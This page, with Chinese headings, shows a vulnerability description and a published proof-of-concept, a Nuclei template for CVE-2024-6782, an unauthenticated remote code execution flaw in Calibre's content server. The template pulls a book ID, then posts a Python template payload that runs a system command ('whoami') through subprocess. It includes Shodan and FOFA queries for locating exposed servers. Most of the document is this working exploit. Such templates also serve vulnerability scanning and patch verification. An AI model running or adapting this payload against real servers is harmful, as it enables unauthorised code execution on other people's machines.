漏洞描述
Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0.
CVE-2024-6782: Calibre <= 7.14.0 Remote Code Execution
PoC代码[已公开]
id: CVE-2024-6782
info:
name: Calibre <= 7.14.0 Remote Code Execution
author: DhiyaneshDK
severity: critical
description: |
Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0.
reference:
- https://starlabs.sg/advisories/24/24-6781/
classification:
epss-score: 0.93799
epss-percentile: 0.99857
cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: calibre-ebook
product: calibre
shodan-query: html:"Calibre"
fofa-query: "Server: calibre"
max-request: 2
tags: cve,cve2024,calibre,rce
http:
- raw:
- |
GET /interface-data/books-init HTTP/1.1
Host: {{Hostname}}
Referer: {{RootURL}}
extractors:
- type: json
name: book_ids
internal: true
json:
- '.search_result.book_ids[0]'
- raw:
- |
POST /cdb/cmd/list HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
[
["template"],
"",
"",
"",
{{book_ids}},
"python:def evaluate(a, b):\n import subprocess\n try:\n return subprocess.check_output(['cmd.exe', '/c', 'whoami'])\n except Exception:\n return subprocess.check_output(['sh', '-c', 'whoami'])\n"
]
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "b'([^']+)"
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 4b0a00483046022100dceeb6655297898335e1e8a2c9627413b5ab2ae7572559ef57592d34b5cd0813022100eb15755ef4dc9b4c58ebd6ac7c1a9618e42212671e9fab46a81b87daeaa78c35:922c64590222798bb761d5b6d8e72950